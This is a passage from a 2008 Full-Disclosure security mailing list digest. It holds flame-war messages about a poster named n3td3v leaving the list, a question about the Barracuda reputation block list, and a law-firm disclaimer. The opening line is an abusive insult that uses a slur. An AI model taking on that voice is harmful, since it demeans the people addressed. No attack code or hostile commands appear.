your keyboard you fucking scary retarded. 2008/12/22 n3td3v <xploitable () gmail com>
On Mon, Dec 22, 2008 at 9:30 PM, Kevin Finisterre (lists) <kf_lists () digitalmunition com> wrote:gtfo of fd.No problem... I'd been away for some time now. Sorry I bothered dropping in. -KFDon't worry, they tell me to GTFO of FD as well. It seems the real researchers aren't welcome here anymore. :( _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/e0550def/attachment-0001.html ------------------------------ Message: 25 Date: Mon, 22 Dec 2008 22:53:29 +0000 From: n3td3v <xploitable () gmail com> Subject: [Full-disclosure] This list has run its course To: full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221453m1d5cf1cfp6456ce8e9f686812 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 Real researchers who should be taken seriously aren't taken seriously anymore. I'm leaving full-disclosure because of the abuse. It's just turned into flames to spin people up, I don't get a chance to talk about security or my skill set. It's abuse after abuse after abuse. Sorry, I can't take it anymore. Got to go, bye. ------------------------------ Message: 26 Date: Mon, 22 Dec 2008 22:57:58 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] Fresh Phish anyone? To: Valdis.Kletnieks () vt edu, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221457o59346a7dl7f323a731ebcc263 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 This "blogger" that you don't take seriously is gone. On Mon, Dec 22, 2008 at 10:42 PM, <Valdis.Kletnieks () vt edu> wrote:
On Mon, 22 Dec 2008 21:53:29 GMT, n3td3v said:It seems the real researchers aren't welcome here anymore.How does that follow from your experience here, given that you claim to be a blogger rather than an actual serious researcher? (And before you say "but I *am* a researcher", keep in mind that many on the list will immediately counter "researching what?") _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
------------------------------ Message: 27 Date: Mon, 22 Dec 2008 22:59:18 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] This list has run its course To: "Ben Preston" <benjamin.preston () gmail com>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310812221459l59a1f85wb6bd238c43b19f31 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 Won't be back on this list, n3td3v will continue elsewhere on the internet, just not "HERE". On Mon, Dec 22, 2008 at 10:56 PM, Ben Preston <benjamin.preston () gmail com> wrote:
Bye. See you in a few months. -- Ben
------------------------------ Message: 28 Date: Mon, 22 Dec 2008 18:12:33 -0500 From: "Elazar Broad" <elazar () hushmail com> Subject: [Full-disclosure] Barracuda Reputation Block List To: full-disclosure () lists grok org uk Message-ID: <20081222231233.F1E1820040 () smtp hushmail com> Content-Type: text/plain; charset="UTF-8" -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Barracuda opened this up to the public back in September, see http://www.barracudacentral.org/rbl. I have been using it for about 2 months or so, it seems to be pretty effective. Is anyone else out there using it? What do you think? elazar -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQECAAYFAklQHuEACgkQi04xwClgpZhh5QP8D3SB52oQNBj+PrJYxw9hImgZiznE Qa3XJmAOn2b7f1P/1oPCIoByjcLGe6U4J8+JJUl3QPr3P4wgAwHMqbf3Yy+4doBTVGnB 4jOKHSQ+wP+lz/hMUMTJMAnQGgLhcgt7ulRNi8WMYcHAsVyl5uxu8l+WMQq2FhuYxUfm m57Hxz8= =GX/H -----END PGP SIGNATURE----- -- Not having a degree dragging you down?? Click here for free information. http://tagline.hushmail.com/fc/PnY6qxtpfWJSSKs8QEHNNaIVpHqi0Ph0jajkuMOaz4rQFSSwqjohy/ ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 46, Issue 43 *********************************************** ********************************************************** To ensure compliance with requirements imposed by U.S. Treasury Regulations, Proskauer Rose LLP informs you that any U.S. tax advice contained in this communication (including any attachments) was not intended or written to be used, and cannot be used, for the purpose of (i) avoiding penalties under the Internal Revenue Code or (ii) promoting, marketing or recommending to another party any transaction or matter addressed herein. ********************************************************* This message and its attachments are sent from a law firm and may contain information that is confidential and protected by privilege from disclosure. If you are not the intended recipient, you are prohibited from printing, copying, forwarding or saving them. Please delete the message and attachments without printing, copying, forwarding or saving them, and notify the sender immediately. ============================================================================= _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Full-Disclosure Digest, Vol 46, Issue 43 Dowling, Gabrielle (Dec 22)